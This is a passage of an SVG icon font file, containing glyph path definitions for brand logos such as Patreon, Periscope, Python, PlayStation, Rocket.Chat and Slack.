l-22.4004 -217.2c0 -43.8994 -44.6992 -44.2998 -44.6992 -44.2998h-288.9c-44.7002 0 -44.7002 44.2998 -44.7002 44.2998l-22.3994 217.2h-30c-38.5 0 -38.4004 37.4004 -38.4004 37.4004z" />
    <glyph glyph-name="patreon" unicode="&#xf3d9;" horiz-adv-x="512" 
d="M512 253.2c0 -101.3 -82.4004 -183.8 -183.8 -183.8c-101.7 0 -184.4 82.3994 -184.4 183.8c0 101.6 82.7002 184.3 184.4 184.3c101.399 0 183.8 -82.7002 183.8 -184.3zM0 -53.5v491h90v-491h-90z" />
    <glyph glyph-name="periscope" unicode="&#xf3da;" 
d="M370 384.4c38.4004 -40.7002 59.5 -94.3008 59.5 -150.801c0 -74.2998 -57.4004 -159.5 -82 -192.6c-8 -10.7998 -79.2998 -105 -120.9 -105c-34 0 -88.7998 56.5 -125.399 104.9c-24.9004 32.8994 -82.7002 117.6 -82.7002 192.699c0 118.2 93.4004 214.4 208.1 214.4
c53.9004 0 104.801 -22.5996 143.4 -63.5996zM226.6 -45.9004c37.3008 0 184.801 167.301 184.7 279.4c0 107.3 -83.8994 196.3 -184.7 196.3c-106.1 0 -190 -88.8994 -190 -196.3c0 -112.1 147.5 -279.4 190 -279.4zM338 241.2c0 -59.1006 -51.0996 -109.7 -110.8 -109.7
c-100.601 0 -150.7 108.2 -92.9004 181.8v-0.399414c0 -24.5 20.1006 -44.4004 44.7998 -44.4004c24.7002 0 44.8008 19.9004 44.8008 44.4004c0 18.1992 -11.1006 33.7998 -26.9004 40.6992c76.5996 19.2002 141 -39.2998 141 -112.399z" />
    <glyph glyph-name="phabricator" unicode="&#xf3db;" horiz-adv-x="496" 
d="M323 185.9c0 0 21.5996 -19.6006 20.9004 -20.7002l-8.10059 -19.7998c-0.5 -1.40039 -29.7002 -0.5 -29.7002 -0.5l-9.09961 -9.10059s1.59961 -31.5 0.200195 -32.0996l-20 -7.5c-1.2998 -0.5 -21.7998 23.2998 -21.7998 23.2998l-13.1006 0.200195
s-19.2998 -24.1006 -20.7002 -23.5l-20.0996 8.2998c-1.40039 0.5 -1.2002 32.2998 -1.2002 32.2998l-9.39941 9.2998s-28.9004 -0.899414 -29.5 0.5l-9.5 20c-0.600586 1.40039 21.0996 21.2002 21.0996 21.2002l-0.0996094 12.9004s-21.6006 19.5996 -21 21
l8.09961 19.7998c0.5 1.2998 29.7002 0.400391 29.7002 0.400391l9.09961 9.09961s-1.59961 28.4004 -0.200195 28.9004l20 8.2998c1.40039 0.599609 21.9004 -20.7998 21.9004 -20.7998l13.0996 -0.200195s19.3008 21.5996 20.7002 21l20.1006 -9.2002
c1.39941 -0.599609 1.19922 -29.0996 1.19922 -29.0996l9.40039 -9.30078s28.9004 0.900391 29.5 -0.5l9.5 -20c0.599609 -1.39941 -21.0996 -21.1992 -21.0996 -21.1992zM278.1 194.6c-0.699219 17 -15.5 30.3008 -32.7998 29.5
c-17.2998 -0.699219 -30.7998 -15.1992 -30.0996 -32.2998c0.700195 -17.0996 15.5 -30.3994 32.7998 -29.5996s30.7998 15.2998 30.0996 32.3994zM479.3 232.5c22.2998 -22.2998 22.2998 -58.7002 0 -81c-67.3994 -67.4004 -44.2998 -44.4004 -95.2998 -95.2998
c-74.4004 -74.5 -194.7 -74.9004 -269.8 -1.60059l-0.100586 -0.0996094c-51 51 -27.5 27.5996 -97.3994 97c-22.2998 22.2998 -22.2998 58.7002 0 81c67.8994 67.4004 44.7998 44.2998 95.7002 95.2998c74.3994 74.4004 194.699 74.9004 269.8 1.60059l0.0996094 0.0996094
zM140.4 84.2002c59.5996 -59.5 156 -59.6006 215.6 -0.100586c59.5996 59.6006 59.5 156.101 0 215.601c-59.5996 59.5 -156.1 59.5996 -215.6 0c-59.6006 -59.5 -59.6006 -156 0 -215.5z" />
    <glyph glyph-name="phoenix-framework" unicode="&#xf3dc;" horiz-adv-x="640" 
d="M212.9 103.7c-36.7002 -1.2002 -108.7 29.2998 -127.7 106.399c-8.7002 35.3008 -2.7002 51.8008 -8 86.1006c-8.2002 53.3994 -32.1006 72.2002 -55.9004 76.5c-6.2002 1.09961 -12.3994 1.2998 -18.7002 0.299805
c-0.799805 -0.0996094 -1.59961 -0.200195 -2.39941 -0.200195c-0.100586 0.200195 -0.100586 0.299805 -0.200195 0.5c0.700195 0.600586 1.40039 1.2002 2.2002 1.7998c36.8994 26.9004 92 38.4004 136.3 35c123.6 -9.5 141.3 -156.6 252.5 -173.1
c6.09961 -0.900391 12.2998 -1.09961 18.5 -1.7002c0.700195 -0.0996094 1.40039 -0.0996094 2.5 -0.200195c-2.09961 -2.19922 -21.5996 -11.7998 -36.5 -14.5c-18.4004 -3.39941 -35.7002 -0.0996094 -51.2998 10.3008c-14.5 9.7998 -24.5 23.5 -38.9004 27.3994
c-13 3.60059 -34.0996 1.7002 -35.8994 -19.5996c-1.30078 -15.9004 14.1992 -51.7998 51.7998 -74.6006c40.3994 -24.5 101.399 -26.8994 134.7 -14.7998c0.299805 0.100586 0.699219 0.200195 1.09961 0.299805c0.200195 0.100586 0.400391 0 1 -0.0996094
c-23.5996 -28.4004 -71.2002 -49.9004 -108.2 -45.4004c-50.3994 6.2002 -77.7002 75.9004 -113.7 97.5c-19.0996 11.5 -49.0996 7 -52 -18.5c-1.09961 -10 2.10059 -19 6.40039 -27.5996c24.4004 -48.5996 65.5996 -47 68 -49.5996
c-2.7998 -0.800781 -21.7998 -2.10059 -25.5996 -2.2002zM75.2998 383.1c13.1006 -14.5 34.2002 -7.89941 35.2998 6.80078c-12.3994 -0.700195 -24.5 -2.2002 -36.5996 -4.80078c0.400391 -0.799805 0.400391 -1 1.2998 -2zM272.2 32.5996
c-42.7998 -1.19922 -92 26.7002 -123.5 61.4004c-4.60059 5 -16.7998 20.2002 -18.6006 23.4004l0.400391 0.399414c6.59961 -4.09961 25.7002 -18.5996 54.7998 -27c24.2002 -7 48.1006 -6.2998 71.6006 3.2998c22.6992 9.30078 41 0.5 43.0996 -2.89941
c-18.5 -3.7998 -20.0996 -4.40039 -24 -7.90039c-5.09961 -4.39941 -4.59961 -11.7002 7 -17.2002c26.2002 -12.3994 63 2.80078 97.2002 -25.3994c2.39941 -2 8.09961 -7.7998 10.0996 -10.7002c-0.0996094 -0.200195 -0.299805 -0.299805 -0.399414 -0.5
c-4.80078 1.5 -16.4004 7.5 -40.2002 9.2998c-24.7002 2 -46.2998 -5.2998 -77.5 -6.2002zM447 284.6c16.4004 5.2002 41.2998 13.4004 66.5 3.30078c16.0996 -6.5 26.2002 -18.7002 32.0996 -34.6006c3.5 -9.39941 5.10059 -19.7002 5.10059 -28.7002
c-0.200195 0 -0.400391 0 -0.600586 -0.0996094c-0.199219 0.400391 -0.399414 0.900391 -0.5 1.2998c-5 22 -29.8994 43.7998 -67.5996 29.9004c-50.2002 -18.6006 -130.4 -9.7002 -176.9 48c-0.699219 0.899414 -2.39941 1.7002 -1.2998 3.2002
c0.100586 0.199219 2.10059 -0.600586 3 -1.30078c18.1006 -13.3994 38.2998 -21.8994 60.2998 -26.1992c30.5 -6.10059 54.6006 -2.90039 79.9004 5.19922zM549.7 167.1c-32.4004 -0.199219 -33.7998 -50.0996 -103.601 -64.3994
c-18.1992 -3.7002 -38.6992 -4.60059 -44.8994 -4.2002v0.400391c2.7998 1.5 14.7002 2.59961 29.7002 16.5996c7.89941 7.2998 15.2998 15.0996 22.7998 22.9004c19.5 20.1992 41.3994 42.1992 81.8994 39c23.1006 -1.80078 29.3008 -8.2002 36.1006 -12.7002
c0.299805 -0.200195 0.399414 -0.5 0.700195 -0.900391c-0.5 0 -0.700195 -0.0996094 -0.900391 0c-7 2.7002 -14.2998 3.2998 -21.7998 3.2998zM537.4 191.2c-0.100586 -0.200195 -0.100586 -0.400391 -0.200195 -0.600586c-28.9004 4.40039 -48 7.90039 -68.5 -4
c-17 -9.89941 -31.4004 -20.5 -62 -24.3994c-27.1006 -3.40039 -45.1006 -2.40039 -66.1006 8c-0.299805 0.200195 -0.599609 0.399414 -1 0.599609c0 0.200195 0.100586 0.299805 0.100586 0.5c24.8994 -3.7998 36.3994 -5.09961 55.5 5.7998
c22.2998 12.9004 40.0996 26.6006 71.2998 31c29.5996 4.10059 51.2998 -2.5 70.9004 -16.8994zM268.6 350.7c-0.599609 0.599609 -1.09961 1.2002 -2.09961 2.2998c7.59961 0 29.7002 1.2002 53.4004 -8.40039c19.6992 -8 32.1992 -21 50.1992 -32.8994
c11.1006 -7.2998 23.4004 -9.2998 36.4004 -8.10059c4.2998 0.400391 8.5 1.2002 12.7998 1.7002c0.400391 0.100586 0.900391 0 1.5 -0.299805c-0.599609 -0.400391 -1.2002 -0.900391 -1.7998 -1.2002c-8.09961 -4 -16.7002 -6.2998 -25.5996 -7.09961
c-26.1006 -2.60059 -50.3008 3.7002 -73.4004 15.3994c-19.2998 9.90039 -36.4004 22.9004 -51.4004 38.6006zM640 112.3c-3.5 -3.09961 -22.7002 -11.5996 -42.7002 -5.2998c-12.2998 3.90039 -19.5 14.9004 -31.5996 24.0996
c-10 7.60059 -20.9004 7.90039 -28.1006 8.40039c0.600586 0.799805 0.900391 1.2002 1.2002 1.40039c14.7998 9.19922 30.5 12.1992 47.2998 6.5c12.5 -4.2002 19.2002 -13.5 30.4004 -24.2002c10.7998 -10.4004 21 -9.90039 23.0996 -10.5
c0.100586 0.0996094 0.200195 0 0.400391 -0.400391zM427.5 -24.7002c2.2002 -1.2002 1.59961 -1.5 1.5 -2c-18.5 1.40039 -33.9004 7.60059 -46.7998 22.2002c-21.7998 24.7002 -41.7002 27.9004 -48.6006 29.7002c0.5 0.200195 0.800781 0.399414 1.10059 0.399414
c13.0996 -0.0996094 26.0996 -0.699219 38.8994 -3.89941c25.3008 -6.40039 35 -25.4004 41.6006 -35.2998c3.2002 -4.80078 7.2998 -8.30078 12.2998 -11.1006z" />
    <glyph glyph-name="playstation" unicode="&#xf3df;" horiz-adv-x="576" 
d="M570.9 75.7002c-11.3008 -14.2002 -38.8008 -24.2998 -38.8008 -24.2998l-205.1 -73.6006v54.2998l150.9 53.8008c17.0996 6.09961 19.7998 14.7998 5.7998 19.3994c-13.9004 4.60059 -39.1006 3.2998 -56.2002 -2.89941l-100.5 -35.5v56.3994
c23.2002 7.7998 47.0996 13.6006 75.7002 16.7998c40.8994 4.5 90.8994 -0.599609 130.2 -15.5c44.1992 -14 49.1992 -34.6992 38 -48.8994zM346.5 168.2v139c0 16.2998 -3 31.2998 -18.2998 35.5996c-11.7002 3.7998 -19 -7.09961 -19 -23.3994v-347.9l-93.7998 29.7998
v414.7c39.8994 -7.40039 98 -24.9004 129.199 -35.4004c79.5 -27.2998 106.4 -61.2998 106.4 -137.8c0 -74.5 -46 -102.8 -104.5 -74.5996zM43.2002 37.7998c-45.4004 12.7998 -53 39.5 -32.2998 54.7998c19.0996 14.2002 51.6992 24.9004 51.6992 24.9004l134.5 47.7998
v-54.5l-96.7998 -34.5996c-17.0996 -6.10059 -19.7002 -14.7998 -5.7998 -19.4004c13.9004 -4.59961 39.0996 -3.2998 56.2002 2.90039l46.3994 16.8994v-48.7998c-51.5996 -9.2998 -101.399 -7.2998 -153.899 10z" />
    <glyph glyph-name="pushed" unicode="&#xf3e1;" horiz-adv-x="432" 
d="M407 336.1c21.7002 -1.89941 33.7998 -28 17.4004 -44.7998l-235.2 -231.3l-35.2998 -80.7998c-11 -17.2002 -41.2002 -14.2998 -47.7002 7l-105.101 348.3c-4.59961 18.2998 6.30078 33.9004 21.4004 36.5996l271.3 44.4004c17.9004 3.40039 39.1006 -13.5 28.7002 -37
l-14 -33.4004zM297.6 394.4l-189 -31l177.4 -16.3008l16.7998 39.9004c2.2998 4.90039 -0.0996094 8.09961 -5.2002 7.40039zM22.7002 340.1l157.899 -244.3l96.9004 230.7l-248.7 22.7002c-5.09961 0.899414 -9.2002 -4 -6.09961 -9.10059zM136 -8.40039
c0 0 28.2002 64.1006 35.2002 79.1006l-127.7 197.6l83.0996 -275.5c1.5 -4.2998 6.80078 -5.2002 9.40039 -1.2002zM408.8 306.1c3.10059 3.30078 1.40039 7.5 -2.59961 8.60059l-106.4 9.7002l-89.7002 -213.7z" />
    <glyph glyph-name="python" unicode="&#xf3e2;" 
d="M439.8 247.5c10.7002 -42.9004 11.2002 -75.0996 0 -108.6c-10.7998 -32.5 -22.2998 -54.2002 -53.3994 -54.2002h-160.2v-13.6006h106.7v-40.6992c0 -30.8008 -26.5 -46.5 -53.4004 -54.3008c-40.5 -11.6992 -73 -9.89941 -106.8 0
c-28.2002 8.30078 -53.4004 25.3008 -53.4004 54.3008v101.8c0 29.2998 24.2002 54.2998 53.4004 54.2998h106.8c35.5996 0 66.7998 31 66.7998 67.7998v47.4004h40.1006c31.0996 0 45.6992 -23.2998 53.3994 -54.2002zM286.2 44c-11 0 -20 -9 -20.1006 -20.2998
c0 -11.2002 9.10059 -20.4004 20.1006 -20.4004c11.0996 0 20.0996 9.10059 20.0996 20.4004c0 11.2002 -9 20.2998 -20.0996 20.2998zM167.8 199.9c-36.2998 0 -66.7998 -31.1006 -66.7998 -66.4004v-48.7998h-36.7002c-31.0996 0 -49.2002 22.5996 -56.7998 54.2002
c-10.2002 42.5 -9.7998 67.8994 0 108.6c8.5 35.5 35.7002 54.2002 66.7998 54.2002h147v13.5996h-106.899v40.7002c0 30.9004 8.19922 47.5996 53.3994 55.5996c32.1006 5.7002 71 6 106.8 0.100586c29 -4.90039 53.4004 -26.6006 53.4004 -55.6006v-101.899
c0 -29.7998 -23.7002 -54.2998 -53.4004 -54.2998h-106.8zM161.1 342.5c11.1006 0 20.1006 9.09961 20.1006 20.2998s-9.10059 20.4004 -20.1006 20.4004c-11.0996 0 -20 -9.10059 -20.0996 -20.4004c0 -11.2002 9 -20.2998 20.0996 -20.2998z" />
    <glyph glyph-name="red-river" unicode="&#xf3e3;" 
d="M353.2 416c52.3994 0 94.7998 -42.4004 94.7998 -94.7998v-258.4c0 -52.3994 -42.4004 -94.7998 -94.7998 -94.7998h-258.4c-52.3994 0 -94.7998 42.4004 -94.7998 94.7998v258.4c0 52.3994 42.4004 94.7998 94.7998 94.7998h258.4zM144.9 247.1
c-0.600586 12.4004 11.6992 24.6006 24 24h56.2998c27 0 48.8994 21.9004 48.8994 48.9004h-154.199c-13.2002 0 -23.9004 -10.7002 -23.9004 -23.9004v-154.199c27 0 48.9004 21.8994 48.9004 48.8994v56.2998zM321.2 175.1c27 0 48.8994 21.9004 48.8994 48.9004h-154.199
c-13.2002 0 -23.9004 -10.7002 -23.9004 -23.9004v-154.199c27 0 48.9004 21.8994 48.9004 48.8994v56.2998c-0.600586 12.4004 11.6992 24.6006 24 24h56.2998z" />
    <glyph glyph-name="wpressr" unicode="&#xf3e4;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM419.33 281.4c2.41016 5.47949 0.459961 8.2793 -5.62012 8.26953c-104.8 0.00976562 -107.69 -0.0302734 -130.78 0.0302734
c-4.31934 0.00976562 -7.10938 -1.82031 -8.83984 -5.78027c-5.70996 -13.0996 -11.5195 -26.1504 -17.2998 -39.21c-2.57031 -5.7998 -1 -8.26953 5.26953 -8.26953c25.2607 0 50.5205 -0.0107422 75.7803 0.0195312
c10.0303 0.00976562 8.54004 -13.6602 -3.89941 -13.6396c-26.4307 0.0498047 -52.8604 0 -79.29 0.0498047c-4.91016 0.00976562 -8.33008 -1.88965 -10.3506 -6.5c-4.2998 -9.83008 -32.1494 -73.0801 -32.1895 -73.1602
c-3.2002 -7.16016 -16.2607 -6.09961 -11.2803 5.33008c8.26953 18.9902 16.6504 37.9297 24.9795 56.8896c2.25 5.11035 -0.0996094 8.74023 -5.65918 8.75c-15.21 0.0205078 -30.4307 -0.0400391 -45.6406 0.0400391
c-3.35938 0.0107422 -5.41016 -1.29004 -6.76953 -4.38965c-31.4307 -71.8701 -29.7803 -67.3203 -30.0098 -67.6904c-3.87012 -6.37012 -14.8604 -3.34961 -10.9502 5.60059c5.66992 13.0098 11.3701 26.0098 17.0898 39c13.5703 30.7793 27.1396 61.5596 40.7402 92.3301
c2.54004 5.75 -0.419922 10.5801 -6.66016 10.5898c-14.2402 0.0302734 -28.4805 -0.0498047 -42.7197 0.0498047c-4.26074 0.0302734 -6.84082 -1.76953 -8.54004 -5.65039c-12.8604 -29.3896 -25.8203 -58.7295 -38.75 -88.0791
c-8.62012 -19.5605 -17.2305 -39.1201 -25.8906 -58.6602c-1.58008 -3.55078 -1.47949 -6.78027 1.20996 -9.73047c11.2207 -12.3096 22.4707 -24.6094 33.6807 -36.9395c2.08984 -2.30078 4.58984 -3.4502 7.71973 -3.4502c45.9395 0.0195312 91.8701 0.00976562 137.81 0
c3.86035 0 6.37988 1.78027 7.91992 5.29004c10.3203 23.5 20.7607 46.9395 30.9502 70.5c2.08984 4.83008 5.21973 6.75 10.3398 6.71973c23.0205 -0.110352 46.0303 -0.0400391 69.0508 -0.0498047c6.0791 0 10.5293 2.72949 12.9697 8.24023
c15.2598 34.4795 30.4502 68.9893 45.6299 103.5z" />
    <glyph glyph-name="replyd" unicode="&#xf3e6;" 
d="M320 -32h-192c-70.4004 0 -128 57.5996 -128 128v192c0 70.4004 57.5996 128 128 128h192c70.4004 0 128 -57.5996 128 -128v-192c0 -70.4004 -57.5996 -128 -128 -128zM193.4 174.8c-6.10059 2 -11.6006 3.10059 -16.4004 3.10059
c-7.2002 0 -13.5 -1.90039 -18.9004 -5.60059c-5.39941 -3.7002 -9.59961 -9 -12.7998 -15.7998h-1.09961l-4.2002 18.2998h-28v-138.899h36.0996v89.6992c1.5 5.40039 4.40039 9.80078 8.7002 13.2002c4.2998 3.40039 9.7998 5.10059 16.2002 5.10059
c4.59961 0 9.7998 -1 15.5996 -3.10059zM308.6 71.4004c-3.19922 -2.40039 -7.69922 -4.80078 -13.6992 -7.10059s-12.8008 -3.5 -20.4004 -3.5c-12.2002 0 -21.0996 3 -26.5 8.90039c-5.5 5.89941 -8.5 14.7002 -9 26.3994h83.2998
c0.900391 4.80078 1.60059 9.40039 2.10059 13.9004c0.5 4.40039 0.699219 8.59961 0.699219 12.5c0 10.7002 -1.59961 19.7002 -4.69922 26.9004c-3.2002 7.19922 -7.30078 13 -12.5 17.1992c-5.2002 4.30078 -11.1006 7.30078 -17.8008 9.2002
c-6.69922 1.7998 -13.5 2.7998 -20.5996 2.7998c-21.0996 0 -37.5 -6.09961 -49.2002 -18.2998s-17.5 -30.5 -17.5 -55c0 -22.7998 5.2002 -40.7002 15.6006 -53.7002c10.3994 -13.0996 26.7998 -19.5996 49.1992 -19.5996c10.7002 0 20.9004 1.5 30.4004 4.59961
c9.5 3.10059 17.0996 6.80078 22.5996 11.2002zM286.8 141.7c3.7998 -5.40039 5.2998 -13.1006 4.60059 -23.1006h-51.7002c0.899414 9.40039 3.7002 17 8.2002 22.6006c4.5 5.59961 11.5 8.5 21 8.5c8.19922 0.0996094 14.0996 -2.60059 17.8994 -8zM366.7 139.2
c4.09961 -3.90039 9.39941 -5.7998 16.0996 -5.7998c7 0 12.6006 1.89941 16.7002 5.7998c4.09961 3.89941 6.09961 9.09961 6.09961 15.5996s-2 11.6006 -6.09961 15.4004s-9.59961 5.7002 -16.7002 5.7002c-6.7002 0 -12 -1.90039 -16.0996 -5.7002
c-4.10059 -3.7998 -6.10059 -8.90039 -6.10059 -15.4004s2 -11.7002 6.10059 -15.5996zM366.7 38.7002c4.09961 -3.90039 9.39941 -5.7998 16.0996 -5.7998c7 0 12.6006 1.89941 16.7002 5.7998c4.09961 3.89941 6.09961 9.09961 6.09961 15.5996
s-2 11.6006 -6.09961 15.4004s-9.59961 5.7002 -16.7002 5.7002c-6.7002 0 -12 -1.90039 -16.0996 -5.7002c-4.10059 -3.7998 -6.10059 -8.90039 -6.10059 -15.4004c0 -6.59961 2 -11.7002 6.10059 -15.5996z" />
    <glyph glyph-name="resolving" unicode="&#xf3e7;" horiz-adv-x="496" 
d="M281.2 169.8l-197.9 -57.2002l-28.5996 98.6006l188.2 54.0996c52.6992 15.2998 65 8.10059 71.0996 -12.7998l11.2002 -39.2998c5.59961 -19.9004 2 -30.1006 -44 -43.4004zM248.5 440c137 0 248.5 -111.4 247.5 -247.7c0 -136.899 -111.5 -248.3 -248.5 -248.3
c-46 0 -89.5 12.7002 -126.3 34.7002l-23 80.2002l286.8 -37.3008l48.0996 13.3008l-9.69922 34.1992l-220.4 27.1006l92.5996 26.5996c30.2002 8.7002 42 15.7998 61.4004 33.2002c24.5 23 31.7002 45.5 23.5 73.5996l-10.7002 37.8008
c-8.7002 30.1992 -25.0996 49.0996 -61.3994 55.1992c-25.1006 3.5 -44.5 2 -79.3008 -8.19922l-221.899 -63.9004c26 108.8 124.2 189.5 241.3 189.5zM38.2998 59.4004c-24 38.3994 -38.2998 83.2998 -38.2998 131.8z" />
    <glyph glyph-name="rocketchat" unicode="&#xf3e8;" horiz-adv-x="582" 
d="M491.9 342.1c121 -77.3994 120.6 -223.5 0 -300.5c-78 -51.5 -181.4 -63.0996 -267.101 -47.6992c-96.5996 -92.2002 -204 -49.7002 -224.8 -37.4004c0 0 73.9004 62.7998 61.9004 117.8c-45.9004 46.9004 -87.5 146.2 0 235.4c12 55 -61.9004 117.8 -61.9004 117.8
c21 12.2998 128.7 54.9004 224.8 -37.7998c85.9004 15.5 189.3 3.7998 267.101 -47.6006zM297.5 42.0996c128.1 0 232 67 232 149.9s-103.9 150.1 -232 150.1s-232 -67.1992 -232 -150.1c0 -36.2002 19.7002 -69.2998 52.5996 -95.2002
c9.2002 -29.5 3.80078 -62.7002 -16.1992 -99.7998c-0.900391 -1.7002 -1.80078 -3.5 -2.80078 -5.2998c18.2002 1.59961 36 6.7002 52.3008 14.8994c13.3994 7.60059 25.8994 16.9004 37 27.7002l20 19.2998c29.0996 -7.69922 59 -11.5996 89.0996 -11.5zM186.2 156.3
c-19.1006 -0.299805 -34.9004 15 -35.2002 34.1006c-0.700195 45.8994 68.5996 46.8994 69.2998 1.09961v-0.5c0.200195 -19.2998 -15.5 -34.7002 -34.0996 -34.7002zM260.8 190.4c-0.799805 45.8994 68.5 47 69.2998 1.19922v-0.599609
c0.400391 -45.5996 -68.5 -46.0996 -69.2998 -0.599609zM405.8 156.3c-19.0996 -0.299805 -34.8994 15 -35.2002 34.1006c-0.699219 45.8994 68.6006 46.8994 69.3008 1.09961v-0.5c0.199219 -19 -15 -34.5996 -34.1006 -34.7002z" />
    <glyph glyph-name="rockrms" unicode="&#xf3e9;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM405.4 20.5l-101.5 118.9s73.5996 0.199219 74.1992 0.199219c29.6006 -1.09961 46.6006 33.3008 27.6006 56.1006l-157.7 185.1c-13.2002 17.2998 -40.0996 18.4004 -54.5 0
l-147.1 -172.5h90l84.2998 98.9004l84.5996 -99.2998h-75.2998c-30.5 0 -44.5 -35.7002 -26.5996 -56.1006l112 -131.3h90z" />
    <glyph glyph-name="schlix" unicode="&#xf3ea;" 
d="M350.5 290.3l-54.2002 46.1006l73.4004 39l78.2998 -44.2002zM192 325.9l45.7002 28.1992l34.7002 -34.5996l-55.4004 -29zM126.9 319.3l31.8994 22.1006l17.2002 -28.4004l-36.7002 -22.5zM103.6 231.1l-8.7998 34.8008l29.6006 18.2998l13.0996 -35.2998z
M82.4004 314.8l23.8994 18.1006l8.90039 -24l-26.7002 -18.3008zM59 241.5l-3.59961 28.4004l22.2998 15.5l6.09961 -28.7002zM28.4004 224.9l20.7998 12.7998l3.2998 -33.4004l-22.9004 -12zM1.40039 180l19.1992 10.2002l0.400391 -38.2002l-21 -8.7998zM60.5 120.7
l-28.2998 -8.2998l-1.60059 46.7998l25.1006 10.7002zM99 184.8l-31.0996 -13l-5.2002 40.7998l27.3994 14.4004zM123.2 71l-41.6006 -5.90039l-8.09961 63.5l35.2002 10.8008zM151.7 210.9l21.2002 -57.1006l-46.2002 -13.5996l-13.7002 54.0996zM237.4 -19.5996
l-70.9004 3.2998l-24.2998 95.7998l55.2002 8.59961zM152.5 260.1l42.2002 22.4004l28 -45.9004l-50.7998 -21.2998zM193.5 165.2l61.2998 18.7002l52.7998 -86.6006l-79.7998 -11.2998zM244.9 250.8l67.2998 28.7998l65.5 -65.3994l-88.6006 -26.2002z" />
    <glyph glyph-name="searchengin" unicode="&#xf3eb;" horiz-adv-x="459" 
d="M220.6 317.7l-67.1992 -209.3v130.3l-54.7002 -24.2002l54.7002 190.3v-115.3zM137.4 414.4l-1.30078 -4.7002l-15.1992 -52.9004c-40.3008 -15.5 -68.9004 -54.5996 -68.9004 -100.3c0 -52.2998 34.2998 -95.9004 83.4004 -105.5v-53.5996
c-77.9004 10.5 -135.4 78.1992 -135.4 159c0 80.5 59.7998 147.199 137.4 158zM448.8 -32.7998c-11.2002 -11.2002 -23.0996 -12.2998 -28.5996 -10.5c-5.40039 1.7998 -27.1006 19.8994 -60.4004 44.3994c-33.2998 24.6006 -33.5996 35.7002 -43 56.7002
c-9.39941 20.9004 -30.3994 42.6006 -57.5 52.4004l-9.7002 14.7002c-24.6992 -16.9004 -53 -26.9004 -81.2998 -28.7002l2.10059 6.59961l15.8994 49.5c46.5 11.9004 80.9004 54 80.9004 104.2c0 54.5 -38.4004 102.1 -96 107.1v52.1006
c83.2002 -5.10059 148.8 -74.5 148.8 -159.3c0 -33.6006 -11.2002 -64.7002 -29 -90.4004l14.5996 -9.59961c9.80078 -27.1006 31.5 -48 52.4004 -57.4004s32.2002 -9.7002 56.7998 -43c24.6006 -33.2002 42.7002 -54.9004 44.5 -60.2998
c1.7998 -5.40039 0.700195 -17.2998 -10.5 -28.5zM438.9 -14.9004c0 4.40039 -3.60059 8 -8 8c-4.40039 0 -8 -3.59961 -8 -8c0 -4.39941 3.59961 -8 8 -8c4.39941 0 8 3.60059 8 8z" />
    <glyph glyph-name="servicestack" unicode="&#xf3ec;" horiz-adv-x="496" 
d="M88 232c81.7002 -10.2002 273.7 -102.3 304 -232h-392c99.5 8.09961 184.5 137 88 232zM120 384c102.8 -15.5 335.3 -167.9 376 -384h-96c-26.2998 126.7 -150.7 216.7 -233.6 250.4c1.2998 49.6992 -14.1006 98 -46.4004 133.6z" />
    <glyph glyph-name="sistrix" unicode="&#xf3ee;" 
d="M448 -1l-30.5 -31l-146 148.1c-28.7002 -23.6992 -65.2002 -37.8994 -105 -37.8994c-91.7998 0 -166.5 75.7998 -166.5 168.899c0 93.1006 74.7002 168.9 166.6 168.801c91.8008 0 166.5 -75.8008 166.5 -168.9c0 -37 -11.8994 -71.2998 -31.8994 -99.2002zM166.5 117.2
c70.7002 0 128.1 58.2998 128.1 129.899c0 71.6006 -57.5 129.9 -128.1 129.9s-128.1 -58.2998 -128.1 -129.9c0 -71.5996 57.5 -129.899 128.1 -129.899z" />
    <glyph glyph-name="slack-hash" unicode="&#xf3ef;" 
d="M446.2 177.6c6.2002 -19 -3.90039 -39.6992 -22.9004 -45.6992l-45.3994 -15.1006l15.6992 -47c6.10059 -19.0996 -3.89941 -39.7002 -23 -45.8994c-21.2998 -6.10059 -40.0996 6 -46 22.8994l-15.6992 47l-93.6006 -31.2998l15.7002 -47
c6.09961 -19.0996 -3.90039 -39.7002 -23 -45.9004c-21.2998 -6.09961 -40.0996 6 -46 22.9004l-15.7002 47c-45.7002 -15.2002 -50.8994 -17.7998 -57.7002 -16.7998c-14.5 0.599609 -28.5996 10.0996 -33.5996 24.5996c-6.09961 19 4 39.7002 23 45.9004l45.4004 15.0996
l-30.3008 90c-45.6992 -15.2002 -50.8994 -17.7998 -57.6992 -16.7998c-14.5 0.599609 -28.6006 10.0996 -33.6006 24.5996c-6.09961 19.1006 3.90039 39.7002 23 45.9004l45.2998 15l-15.6992 47c-6.10059 19.0996 3.89941 39.7002 23 45.9004
c19.0996 6.19922 39.7998 -3.90039 46 -22.9004l15.6992 -47l93.4004 31.2002l-15.7002 47c-6.09961 19.0996 3.90039 39.7002 23 45.8994c19.1006 6.2002 39.7998 -3.89941 46 -22.8994l15.7002 -47l45.4004 15.0996c19.0996 6.2002 39.7998 -3.89941 46 -22.8994
c6.09961 -19.1006 -3.90039 -39.7002 -23 -45.9004l-45.4004 -15.0996l30.2998 -90l45.4004 15.0996c19.0996 6.2002 39.7998 -3.90039 46 -22.9004zM192.1 130.4l93.5 31.2998l-30.2998 90.2002l-93.5 -31.3008z" />
    <glyph glyph-name="speakap" unicode="&#xf3f3;" horiz-adv-x="430" 
d="M55.0098 56.2197c-79.4102 88.1904 -71.96 224.36 16.6406 304.141c88.5996 79.7793 224.8 72.96 304.21 -15.2402c79.4092 -88.2002 71.96 -224.36 -16.6406 -304.14c-18.7393 -16.8701 64.0303 -43.0908 42.0205 -52.2607c-82.0605 -34.21 -253.91 -35.04 -346.23 67.5
zM268.32 267.82l38.5 40.8594c-9.61035 8.89062 -32.0205 26.8301 -76.1699 27.6006c-52.3301 0.910156 -95.8604 -28.2998 -96.7705 -79.96c-0.200195 -11.3301 0.290039 -36.7207 29.4199 -54.8301c34.46 -21.4199 86.5205 -21.5098 85.9805 -52.2598
c-0.370117 -21.2803 -26.4199 -25.8105 -38.5898 -25.6006c-2.98047 0.0498047 -30.2305 0.459961 -47.6104 24.6201l-39.9502 -42.6104c28.1602 -27.0098 58.9902 -32.6201 83.4902 -33.0498c10.2295 -0.179688 96.4199 -0.330078 97.8398 81
